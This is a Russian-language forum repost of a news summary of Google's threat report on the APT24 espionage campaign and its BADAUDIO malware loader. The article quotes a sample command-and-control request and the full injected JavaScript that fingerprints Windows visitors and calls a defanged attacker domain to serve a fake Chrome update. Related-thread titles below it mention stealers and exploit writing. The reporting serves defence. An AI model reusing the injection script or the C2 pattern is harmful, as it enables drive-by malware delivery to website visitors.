«Обновите Chrome для защиты» — самая опасная кнопка интернета.

Support81

Модератор
Как цифровая мафия грабила корпорации через поддельные апдейты.
Apt24



Команда Google Threat Intelligence Group представила подробный разбор многолетней кибершпионской кампании, связанной с группировкой APT24. По их данным, в течение 3 лет эта команда последовательно распространяет вредоносный загрузчик BADAUDIO, который применяется для закрепления в сетях жертв и дальнейшего развертывания инструментов удалённого управления.

За время наблюдений вектор распространения заметно усложнился. На ранних этапах злоумышленники опирались на массовый взлом легитимных сайтов, превращая их в площадки для установки вредоносного JavaScript. Позже схема расширилась: возникли поставочные атаки через тайваньскую маркетинговую компанию, а также серия фишинговых писем, направленных на конкретных сотрудников разных организаций.

BADAUDIO представляет собой загрузчик на C++, работающий в роли первой стадии. Он устанавливает сетевое соединение с сервером управления, собирает данные о системе и, используя встроенный ключ AES, шифрует эти сведения. После отправки зашифрованного блока в cookie-параметре загрузчик получает полезную нагрузку, расшифровывает её тем же ключом и выполняет в оперативной памяти. В одном из эпизодов такой нагрузкой оказался Cobalt Strike Beacon, однако специалисты подчёркивают, что его использование не является универсальным.

Пример запроса, приведённый GTIG:

GET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1
Host: wispy[.]geneva[.]workers[.]dev
Cookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NFjqOBqFQ==
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache


Вредонос также может использовать иной формат идентификатора, который вставляется в параметры запроса, чтобы операторы могли отслеживать конкретные заражённые узлы.

Код загрузчика заметно затрудняет анализ благодаря технике выпрямления управления. Эта схема разрушает обычную структуру программы и заменяет её набором разрозненных блоков, выполнение которых определяется центральным управляющим фрагментом. Из-за этого автоматический анализ и реверс-инжиниринг требуют значительно больше времени.

BADAUDIO чаще всего загружается как DLL через подмену порядка поиска библиотек по механизму DLL Search Order Hijacking (MITRE ATT&CK T1574.001). В свежих образцах вредоносная библиотека упакована в зашифрованный архив вместе с BAT, VBS и LNK-файлами, которые автоматизируют копирование легитимного EXE и DLL в пользовательские каталоги, создают запись автозапуска и запускают нелегитимную библиотеку через сайдлоадинг. Такой подход уменьшает количество очевидных признаков компрометации.

Google подтвердила, что в одном из случаев полезная нагрузка представляла собой Cobalt Strike Beacon. В конфигурации маяка нашли watermark, ранее встречавшийся в другой кампании APT24. Это значение формируется на основе файла CobaltStrike.auth и позволяет связывать разные инциденты с одной сборкой инструмента.

Кампания развивается уже несколько лет и включает комбинацию методов: взлом сайтов, поставочные атаки и целевые фишинговые письма. Каждая из веток использует собственную систему фильтрации жертв и проверки окружения.

Первое массовое использование BADAUDIO через взломанные сайты Google зафиксировала в ноябре 2022 года. Было обнаружено свыше 20 ресурсов разной тематики. Во все сайты внедряли модифицированный JavaScript, который включал этап фильтрации по операционной системе и браузеру. В результате цепочка активировалась только для Windows.

Фрагмент JavaScript из отчета GTIG:

$(window).ready(function() {
var userAgent = navigator.userAgent;
var isIE = userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1;
var isEdge = userAgent.indexOf("Edge") > -1 && !isIE;
var isIE11 = userAgent.indexOf('Trident') > -1 && userAgent.indexOf("rv:11.0") > -1;
var isMac = userAgent.indexOf('Macintosh') > -1;
var isiPhone = userAgent.indexOf('iPhone') > -1;
var isFireFox = userAgent.indexOf('Firefox') > -1;
if (!isIE && !isEdge && !isIE11 && !isMac && !isiPhone && !isFireFox) {
var tag_script = document.createElement("script");
tag_script.type = "text/javascript";
tag_script.src = "https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js";
tag_script.onload = "initFingerprintJS()";
document.body.appendChild(tag_script);
if (typeof(callback) !== "undefined") {
tag_script.onload = function() {
callback();
};
}
function callback() {
var option = {
excludes: {
screenResolution: true,
availableScreenResolution: true,
enumerateDevices: true
}
};
new Fingerprint2.get(option, function(components) {
var values = components.map(function(component) {
return component.value;
});
var murmur = Fingerprint2.x64hash128(values.join(''), 31);
var script_tag = document.createElement("script");
script_tag.setAttribute("src", "https://www[.]twisinbeth[.]com/query.php?id=" + murmur);
document.body.appendChild(script_tag);
});
}
}
});


Скрипт собирал характеристики браузера и вычислял хеш по алгоритму MurmurHash3, после чего отправлял идентификатор на домен злоумышленников. Если параметры подходили под требования, пользователь видел ложное окно «обновления» Chrome, предлагавшее загрузить BADAUDIO.

В июле 2024 года APT24 взломала региональную фирму, поставлявшую JavaScript-библиотеки для анализа трафика и вспомогательных функций веб-сайтов. Этот взлом затронул свыше 1000 доменов. Причём в течение года компания пережила несколько повторных компрометаций, что демонстрирует упорство операторов.

В первой версии вредоносный код внедрили в популярную библиотеку с использованием домена-опечатки, имитирующего ресурс CDN (MITRE ATT&CK T1195.001). В другом случае злоумышленники спрятали обфусцированный JavaScript внутри JSON-файла, который затем подгружался и выполнялся через скомпрометированный скрипт. Это позволяло скрывать вредоносный код в файле, который обычно не воспринимается как исполняемый.

Библиотека FingerprintJS2 снова генерировала x64hash128-отпечатки устройств (MITRE ATT&CK T1082). Далее происходила отправка данных методом POST в Base64 (MITRE ATT&CK T1041). Команда управления выдавала ссылку на следующий фрагмент цепочки, который перенаправлял пользователя на страницу загрузки BADAUDIO (MITRE ATT&CK T1105).

Кроме атак через сайты APT24 проводила фишинговые кампании, используя письма от имени благотворительной организации. В других эпизодах злоумышленники распространяли зашифрованные архивы через Google Drive и OneDrive. Почтовая фильтрация Google автоматически отправляла такие письма в раздел «Спам» и тем самым снижала результативность рассылок. Для отслеживания реакции людей злоумышленники встраивали пиксель-трекинг.

Google включила задействованные домены, сайты и файлы в блок-лист Safe Browsing, что защищает пользователей браузеров, использующих эту инфраструктуру. Компания также отправила уведомления пострадавшим организациям, предоставив технические детали и рекомендации по устранению последствий.

В конце отчета приведены индикаторы компрометации: контрольные суммы JavaScript-файлов, хэши бинарников BADAUDIO, адреса серверов управления, домены промежуточной инфраструктуры и watermark Cobalt Strike Beacon. Дополнительно опубликованы YARA-правила, предназначенные для поиска разных версий загрузчика.
Подробнее: https://www.securitylab.ru/news/566430.php
 
Последнее редактирование:
Похожие темы
Support81 Срочно обновите Chrome: новый 0day раскрывает конфиденциальные данные Новости в сети 0
Support81 У вас роутер ASUS и используете VPN? Обновите прошивку 1.1.2.3_1010 — 3 модели пускают хакеров без пароля Новости в сети 0
Admin Интересно Gemini лезет из каждой дыры Chrome? Вот как убить все ИИ-кнопки и вернуть нормальный браузер. Новости в сети 0
Support81 Призрак в системе: Snake Keylogger опустошает Chrome, Edge и Firefox Новости в сети 0
Support81 Chrome, Firefox и Edge: как Flesh Stealer стал ночным кошмаром для браузеров Новости в сети 0
Support81 0Day в Chrome опустошает криптокошельки по всему миру Новости в сети 0
Support81 0day-эксплойт для Chrome выставлен на продажу за $1 000 000 Новости в сети 0
El_IRBIS Интересно Отключаем Google Ad Topics в Chrome: Шаг за шагом инструкция с практическим применением. Анонимность и приватность 0
E Microsoft Defender ATP принял обновление для Chrome за троянское ПО Новости в сети 1
G Интересно [Chrome] режим Инкогнито по ярлыку в Windows. Анонимность и приватность 0
S Echelon Stealer v6.2.5 + Clipper +Chrome(v80) - source c отправкой на MEGA ! Вирусология 12
Z Интересно Chrome Flags: Security Tools Анонимность и приватность 0
S Команда Chrome работает над новой функцией Новости в сети 0
M Darknet на базе Chrome Анонимность и приватность 14
B Google объявила, что Chrome будет помечать быстрые и медленные сайты Новости в сети 2
M NoScript для Chrome Анонимность и приватность 0
M Бесплатный VPN для Google Chrome Анонимность и приватность 0
A Стиллер паролей для Chrome и Firefox Уязвимости и взлом 0
A Google chrome будет блокировать слишком тяжёлую рекламу Новости в сети 0
G Отключение сервиса слежки и сканирования в Google Chrome Полезные статьи 0
G Воруем пароли из Google Chrome Полезные статьи 1
Admin Полезные плагины для Google Chrome Полезные статьи 0
A Chrome Cookies Read C# Программирование 1
E Скрипт полной блокировки Google Chrome hack Полезные статьи 5
Admin Статья Разбираем инциденты, анализируем honeypots через дашборды для поимки хищников, атакующих нашу инфраструктуру. [Part 2] Анонимность и приватность 0
Admin Статья Разбираем, расставляем honeypots для поимки хищников, атакующих нашу инфраструктуру. [Part 1] Анонимность и приватность 0
Admin Статья Настройки Mozilla Firefox для параноиков и тест Mullvad Browser Анонимность и приватность 0
Admin Статья Написание вредоносного ПО для Windows: для развлечения и прибыли Вирусология 1
Admin Интересно Когда бэкап превращается в тыкву. Veeam случайно создала идеальную точку входа для хакеров. Новости в сети 0
Admin Статья Как оставаться незаметным в 2025 году – простые правила оперативной безопасности для всех. Анонимность и приватность 0
Admin Интересно Ваш роутер D-Link работает уже 10 лет? У нас для вас (и его безопасности) очень плохие новости. Новости в сети 0
Admin Интересно Быстрее, дешевле, проще. Google готовит новую ИИ-модель для генерации изображений. Новости в сети 0
Admin Статья Свежие уязвимости для ОС Windows. Уязвимости и взлом 0
Admin Статья Не доверяй своей железке: Гайд по по-настоящему безопасным ОС для тех, кто в теме Анонимность и приватность 0
Admin Статья Методика добычи высококонвертируемого и дешевого трафика для целевых атак. Полезные статьи 0
Admin Статья Шифрование для ленивых Полезные статьи 0
Admin Интересно $500 – антивирусы и EDR больше не помогут. Хакеры начали торговлю инструментом для обхода защиты Windows. Новости в сети 0
Admin Интересно Охотник стал добычей. Как «безопасники» ловят вирусы, пытаясь скачать инструменты для их поиска. Новости в сети 0
Admin Интересно Загрузил документ — лишился «учётки». ИИ-помощник для юристов подставил под удар 200 тысяч компаний. Новости в сети 0
Admin Статья Софт для реверсинга Вирусология 0
Admin Статья Софт для разработки эксплойтов 2 часть Вирусология 0
Admin Статья Софт для разработки эксплойтов 1 часть Вирусология 0
Admin Интересно 0 на VirusTotal и root-доступ: хакеры смогли обмануть все антивирусы с помощью легального софта для админов. Новости в сети 0
Admin Интересно У этого Марио плохая карма. Киберпреступники превратили любимого героя детства в кошмар для пользователей. Новости в сети 0
Admin Статья ReconSpider - продвинутая платформа для сканирования IP-адресов. OSINT 0
Admin Статья Поисковые запросы для Shodan. OSINT 0
Admin Статья Отравление кэша контекста активации: использование CSRSS для повышения привилегий Уязвимости и взлом 0
Admin Статья Пишем сплойт для обхода DEP: ret2libc и ROP-цепочки против Data Execution Prevention. Уязвимости и взлом 0
Admin Интересно Stealka: новый троян для Windows крадёт всё — от паролей до карт. Новости в сети 0
el_hacker Интересно Компрометированные учетные данные IAM используются для масштабной кампании по майнингу криптовалюты на AWS. Новости в сети 0

Название темы